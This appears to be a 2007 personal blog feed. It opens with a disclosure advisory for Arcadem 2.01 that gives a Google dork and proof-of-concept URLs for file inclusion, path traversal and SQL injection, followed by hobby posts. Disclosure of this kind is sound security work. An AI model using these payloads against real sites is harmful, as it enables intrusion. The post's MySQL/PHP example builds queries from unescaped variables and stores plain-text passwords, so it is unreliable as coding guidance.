scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='arcadem'/><category scheme='http://www.blogger.com/atom/ns#' term='rfi'/><title type='text'>Arcadem RFI / SQL Injection flaws</title><content type='html'>Arcadem Remote File Inclusion Flaw / SQL Injection&lt;br /&gt;&lt;br /&gt;Software: Arcadem 2.01&lt;br /&gt;Vendor link: http://agaresmedia.com&lt;br /&gt;Attack: Remote File Inclusion / SQL Injection&lt;br /&gt;&lt;br /&gt;Discovered by: David Sopas Ferreira a.k.a SmOk3 &lt; smok3f00 at gmail.com &gt;&lt;br /&gt;&lt;br /&gt;Google dork:"Powered by AMCMS3"&lt;br /&gt;&lt;br /&gt;Remote File Inclusion&lt;br /&gt;---------------------&lt;br /&gt;It is possible for a remote attacker to include a file from local or remote resources and/or execute arbitrary script code with the privileges of the webserver.&lt;br /&gt;&lt;br /&gt;Proof of Concept:&lt;br /&gt;&lt;br /&gt;index.php?loadpage=../../../../file&lt;br /&gt;index.php?loadpage=[evilscript]&lt;br /&gt;&lt;br /&gt;Solution:&lt;br /&gt;&lt;br /&gt;Edit the source code to ensure that input is properly validated. Where is possible, it is recommended to make a list of accepted filenames and restrict the input to that list.&lt;br /&gt;&lt;br /&gt;For PHP, the option allow_url_fopen would normally allow a programmer to open, include or otherwise use a remote file using a URL rather than a local file path. It is recommended to disable this option from php.ini.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;SQL Injection&lt;br /&gt;-------------&lt;br /&gt;An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. &lt;br /&gt;&lt;br /&gt;Proof of Concept:&lt;br /&gt;&lt;br /&gt;index.php?blockpage=%2E%2Findex%2Ephp&lt;br /&gt;%3Fblockpage%3D1%26cat%3D&amp;cat=[SQL Injection]&lt;br /&gt;index.php?blockpage=%2E%2Findex%2Ephp&lt;br /&gt;%3Fblockpage%3D1%26cat%3D&amp;cat='&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Solution:&lt;br /&gt;&lt;br /&gt;Your script should filter metacharacters from user input. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Vendor contacted us with the following:&lt;br /&gt;&lt;span style="font-style:italic;"&gt;SmOk3,&lt;br /&gt;&lt;br /&gt;Thanks for your input.  We've verified that the Remote File Inclusion&lt;br /&gt;flaw existed, and have patched that problem in Arcadem 2.02.  We&lt;br /&gt;definitely appreciate the heads up on that.  The SQL Injection is not a&lt;br /&gt;flaw, as all meta characters are stripped.  If you try using the&lt;br /&gt;blockpage?= to send use an SQL injection, you'll find that your query&lt;br /&gt;will fail.&lt;br /&gt;&lt;br /&gt;Cheers,&lt;br /&gt;Jeff Quindlen&lt;br /&gt;Agares Media&lt;br /&gt;(509) 320-4216&lt;br /&gt;sales@agaresmedia.com&lt;br /&gt;http://www.agaresmedia.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://forums.agaresmedia.com/viewtopic.php?f=13&amp;t=19"&gt;More info&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-3079839240554778340?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/3079839240554778340/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=3079839240554778340' title='193 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/3079839240554778340'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/3079839240554778340'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/08/arcadem-rfi-sql-injection-flaws.html' title='Arcadem RFI / SQL Injection flaws'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>193</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-8074258552701388984</id><published>2007-08-17T17:20:00.000-07:00</published><updated>2007-08-17T17:23:35.700-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='opensource'/><category scheme='http://www.blogger.com/atom/ns#' term='mozilla'/><category scheme='http://www.blogger.com/atom/ns#' term='browser'/><title type='text'>Making mozilla faster</title><content type='html'>1. Type "about:config" into the address bar&lt;br /&gt;2. Set "network.http.pipelining" to "true"&lt;br /&gt;3. Set "network.http.proxy.pipelining" to "true" &lt;br /&gt;4. Set "network.http.pipelining.maxrequests" to 30&lt;br /&gt;&lt;br /&gt;You should see some improvements on the your mozilla browser speed :)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Please don't hurt the web&lt;br /&gt;use open standards&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-8074258552701388984?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/8074258552701388984/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=8074258552701388984' title='17 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/8074258552701388984'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/8074258552701388984'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/08/making-mozilla-faster.html' title='Making mozilla faster'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>17</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-4091526586563615730</id><published>2007-08-17T17:07:00.000-07:00</published><updated>2007-08-17T17:08:53.222-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='videoclip'/><category scheme='http://www.blogger.com/atom/ns#' term='daft punk'/><category scheme='http://www.blogger.com/atom/ns#' term='music'/><category scheme='http://www.blogger.com/atom/ns#' term='kanye west'/><title type='text'>Daft Punk rox</title><content type='html'>Ok it has Kanye West also, but... It's Daft Punk beat!&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="350"&gt;&lt;param name="movie" value="http://www.youtube.com/v/MvTAt20eedU"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/MvTAt20eedU" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-4091526586563615730?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/4091526586563615730/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=4091526586563615730' title='11 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/4091526586563615730'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/4091526586563615730'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/08/daft-punk-rox.html' title='Daft Punk rox'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>11</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-6409251903858503971</id><published>2007-07-09T01:34:00.001-07:00</published><updated>2007-07-09T01:42:19.486-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='shrek'/><category scheme='http://www.blogger.com/atom/ns#' term='movies'/><category scheme='http://www.blogger.com/atom/ns#' term='prey'/><category scheme='http://www.blogger.com/atom/ns#' term='review'/><title type='text'>Movies review</title><content type='html'>Shrek The Third: This movie disapoint me a little bit. Shrek movie became too comercial, and the funny parts are very exagerated. Nothing to fancy really...&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.imdb.com/title/tt0413267/"&gt;IMDB rating&lt;/a&gt; 6.5/10&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Prey: A horror/thriller movie where a family is lost in a Africa savana full of hungry lions. Its everything too obvious but the visual scenes are quite fine without any glitches.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.imdb.com/title/tt0468536/"&gt;IMDB rating&lt;/a&gt; 4.8/10&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-6409251903858503971?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/6409251903858503971/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=6409251903858503971' title='11 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/6409251903858503971'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/6409251903858503971'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/07/movies-review.html' title='Movies review'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>11</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-7752052488733391482</id><published>2007-07-06T01:57:00.000-07:00</published><updated>2007-07-06T02:06:12.318-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='noteworks'/><category scheme='http://www.blogger.com/atom/ns#' term='java'/><category scheme='http://www.blogger.com/atom/ns#' term='portuguese'/><category scheme='http://www.blogger.com/atom/ns#' term='code'/><category scheme='http://www.blogger.com/atom/ns#' term='programming'/><title type='text'>NoteWorks - text editor with addons</title><content type='html'>I coded a simple html code editor in JAVA, still in development, to simplify some of my own code, and you can find some testing on php on tools menu. Currently is only available in portuguese but if all goes well, it will have also a english version. &lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.h4cky0u-filez.org/5623884"&gt;Download&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-7752052488733391482?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/7752052488733391482/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=7752052488733391482' title='10 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/7752052488733391482'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/7752052488733391482'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/07/noteworks-text-editor-with-addons.html' title='NoteWorks - text editor with addons'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>10</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-5807812606175037542</id><published>2007-06-27T03:12:00.000-07:00</published><updated>2007-06-27T03:14:53.044-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='java'/><category scheme='http://www.blogger.com/atom/ns#' term='swing'/><category scheme='http://www.blogger.com/atom/ns#' term='code'/><category scheme='http://www.blogger.com/atom/ns#' term='school'/><category scheme='http://www.blogger.com/atom/ns#' term='programming'/><category scheme='http://www.blogger.com/atom/ns#' term='javax'/><title type='text'>JAVA code snips - Part I</title><content type='html'>I'm getting my first steps on JAVA at school so I started getting some addicional information on some fun stuff to put on my programms. After a few hours of reading some ebooks and net forums and was able to put some interesting code on my proggies.&lt;br /&gt;&lt;br /&gt;&lt;em&gt;/** Those confirmation popups for exiting your application */&lt;br /&gt;int x = JOptionPane.showConfirmDialog(this, "Really want exit this application?" , "Title",JOptionPane.OK_CANCEL_OPTION,JOptionPane.QUESTION_MESSAGE);&lt;br /&gt;if (x == 0)&lt;br /&gt; {&lt;br /&gt;        System.exit(0);   &lt;br /&gt;        } &lt;/em&gt;   &lt;br /&gt;&lt;br /&gt;Remember to -- &gt; &lt;em&gt;import javax.swing.*;&lt;/em&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-5807812606175037542?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/5807812606175037542/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=5807812606175037542' title='84 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/5807812606175037542'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/5807812606175037542'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/06/java-code-snips-part-i.html' title='JAVA code snips - Part I'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>84</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-6041157209695031190</id><published>2007-06-26T07:03:00.001-07:00</published><updated>2007-06-26T07:05:16.400-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='girls'/><category scheme='http://www.blogger.com/atom/ns#' term='evil'/><title type='text'>Girls are evil - the proof</title><content type='html'>&lt;a href="http://i34.photobucket.com/albums/d135/shrub_/girlsareevil.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px;" src="http://i34.photobucket.com/albums/d135/shrub_/girlsareevil.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Any doubt?? :-)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-6041157209695031190?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/6041157209695031190/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=6041157209695031190' title='70 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/6041157209695031190'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/6041157209695031190'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/06/girls-are-evil-proof.html' title='Girls are evil - the proof'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>70</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-1985252649891060948</id><published>2007-06-26T01:36:00.000-07:00</published><updated>2007-06-27T03:15:13.061-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='real madrid'/><category scheme='http://www.blogger.com/atom/ns#' term='silver surfer'/><category scheme='http://www.blogger.com/atom/ns#' term='movies'/><category scheme='http://www.blogger.com/atom/ns#' term='football'/><category scheme='http://www.blogger.com/atom/ns#' term='dr doom'/><category scheme='http://www.blogger.com/atom/ns#' term='imdb'/><category scheme='http://www.blogger.com/atom/ns#' term='fantastic 4'/><category scheme='http://www.blogger.com/atom/ns#' term='goal'/><title type='text'>Movies review</title><content type='html'>Another of my hobbies is to watch movies. Every week, I'll try to post a review for every movie that I watch, starting today...&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Fantastic Four - Rise of the Silver Surfer&lt;/strong&gt;: Its a great movie, for me better than the first one. The appearing of Dr Doom, Silver Surfer and Galactus, make the movie more visual attractive and more appealing. &lt;br /&gt;&lt;br /&gt;&lt;a href="http://imdb.com/title/tt0486576/"&gt;IMDB Rating&lt;/a&gt;: 6.6/10&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Goal II - Living the Dream&lt;/strong&gt;: Nice movie for people who like football. It's about a young mexican player who joins Real Madrid and at the same time, have trouble with his girlfriend and family. The best of the movie it's really the presence of almost all Real Madrid players like Robinho, Roberto Carlos, David Beckham, Ronaldo, etc... The football scenes are real matches of the team.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://imdb.com/title/tt0473360/"&gt;IMDB Rating&lt;/a&gt;: 6.0/10&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-1985252649891060948?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/1985252649891060948/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=1985252649891060948' title='76 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/1985252649891060948'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/1985252649891060948'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/06/movies-review.html' title='Movies review'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>76</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-6599791090453530901</id><published>2007-06-20T02:36:00.000-07:00</published><updated>2007-06-20T02:51:42.499-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='mysqli'/><category scheme='http://www.blogger.com/atom/ns#' term='extensions'/><category scheme='http://www.blogger.com/atom/ns#' term='mysql'/><category scheme='http://www.blogger.com/atom/ns#' term='php'/><title type='text'>MySQL 5 + PHP (connecting and instructing)</title><content type='html'>With the new version of MySQL (version 5) new ways of connecting throw PHP is available, especially mysqli, that you can install that extension when you install or repair PHP installation.&lt;br /&gt;&lt;br /&gt;mysqli:&lt;br /&gt;&lt;br /&gt;&lt;em&gt;$conn = mysqli_connect ($server,$username,$passwd,$bd);&lt;br /&gt;$executar = mysqli_query ($conn,"insert into users (userid,passid,level) values ('$name','$pass','$level')");&lt;br /&gt;mysqli_free_result($executar);&lt;br /&gt;mysqli_close($conn);&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;You can also use code that work on any version, still using old sintaxe:&lt;br /&gt;&lt;br /&gt;&lt;em&gt;$sql = "INSERT INTO users (userid,passid,nivel) values ('$nome','$pass','$nivel')";&lt;br /&gt;mysql_connect("localhost","convidado","1234");&lt;br /&gt;$resultado = mysql_db_query("testes",$sql);&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;Hope it help... Tomorrow or so, I'll write some posts about MySQL Stored Procedures.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-6599791090453530901?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/6599791090453530901/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=6599791090453530901' title='68 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/6599791090453530901'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/6599791090453530901'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/06/mysql-5-php-connecting-and-instructing.html' title='MySQL 5 + PHP (connecting and instructing)'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>68</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-8609649644662378949</id><published>2007-06-19T02:14:00.000-07:00</published><updated>2007-06-19T03:29:52.412-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vnunet'/><category scheme='http://www.blogger.com/atom/ns#' term='publicity'/><category scheme='http://www.blogger.com/atom/ns#' term='google'/><category scheme='http://www.blogger.com/atom/ns#' term='microsoft'/><category scheme='http://www.blogger.com/atom/ns#' term='privacy'/><title type='text'>Google negative point on security?</title><content type='html'>Google was the worst company regarding user privacy by &lt;a href="http://www.privacyinternational.org/"&gt;Privacy International&lt;/a&gt;. &lt;br /&gt;Almost everyone knows that Google stores every step you take online, recording every search you do. After that report, Google says that they will delete every record on each 18 / 24 months. &lt;br /&gt;&lt;br /&gt;Well this is not good publicity for Google, but, Microsoft is doing this since their first operative system was out and people still use it... :-)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-8609649644662378949?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/8609649644662378949/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=8609649644662378949' title='72 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/8609649644662378949'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/8609649644662378949'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/06/google-negative-point-on-security.html' title='Google negative point on security?'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>72</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-4200566688291143615</id><published>2007-05-18T03:02:00.000-07:00</published><updated>2007-05-18T03:04:52.938-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='you tube'/><category scheme='http://www.blogger.com/atom/ns#' term='videos'/><category scheme='http://www.blogger.com/atom/ns#' term='thatvideosite'/><category scheme='http://www.blogger.com/atom/ns#' term='family guy'/><title type='text'>Thatvideosite.com</title><content type='html'>I found a huge video hosting site, like youtube, but this one you can click a link and download the file if you want to. They have lot's of videos and take a look into the "Family Guy" section.&lt;br /&gt;&lt;br /&gt;Also you can upload your videos to there.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://thatvideosite.com/"&gt;Thatvideosite.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-4200566688291143615?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/4200566688291143615/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=4200566688291143615' title='16 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/4200566688291143615'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/4200566688291143615'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/05/thatvideositecom.html' title='Thatvideosite.com'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>16</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-5225449352058928103</id><published>2007-05-13T09:43:00.000-07:00</published><updated>2007-05-13T09:45:29.785-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='conspiracy'/><category scheme='http://www.blogger.com/atom/ns#' term='world trade center'/><category scheme='http://www.blogger.com/atom/ns#' term='wtc'/><category scheme='http://www.blogger.com/atom/ns#' term='youtube'/><title type='text'>World Trade Center Conspiracy</title><content type='html'>I seen a lot of videos talking about the WTC conspirary, but this one is on the best explaining the facts...&lt;br /&gt;&lt;br /&gt;Take a look into it and comment that if you like...&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="350"&gt;&lt;param name="movie" value="http://www.youtube.com/v/87fyJ-3o2ws"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/87fyJ-3o2ws" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-5225449352058928103?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/5225449352058928103/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=5225449352058928103' title='13 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/5225449352058928103'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/5225449352058928103'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/05/world-trade-center-conspiracy.html' title='World Trade Center Conspiracy'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>13</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-8165905823004496664</id><published>2007-05-13T09:15:00.000-07:00</published><updated>2007-05-13T09:17:18.462-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='funny'/><category scheme='http://www.blogger.com/atom/ns#' term='harry potter'/><category scheme='http://www.blogger.com/atom/ns#' term='south park'/><category scheme='http://www.blogger.com/atom/ns#' term='youtube'/><title type='text'>New Harry Potter (Southpark version)</title><content type='html'>&lt;object width="425" height="350"&gt;&lt;param name="movie" value="http://www.youtube.com/v/Z8mvrFHcgsc"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/Z8mvrFHcgsc" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-8165905823004496664?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/8165905823004496664/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=8165905823004496664' title='11 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/8165905823004496664'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/8165905823004496664'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/05/new-harry-potter-southpark-version.html' title='New Harry Potter (Southpark version)'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>11</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-7222974663964474847</id><published>2007-05-11T15:42:00.000-07:00</published><updated>2007-05-11T15:46:29.435-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='php'/><category scheme='http://www.blogger.com/atom/ns#' term='milw0rm'/><title type='text'>PHP Underground Security</title><content type='html'>It's not very recent, but it's a simple basic introduction to PHP security. It talks about few basics security flaws on PHP scripting (XSS, RFI, SQL Injection and others) and how can a programmer prevent some of that flaws. Check it out.&lt;br /&gt;&lt;br /&gt;You can read the full article &lt;a href="http://www.milw0rm.com/papers/148"&gt;here&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-7222974663964474847?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' 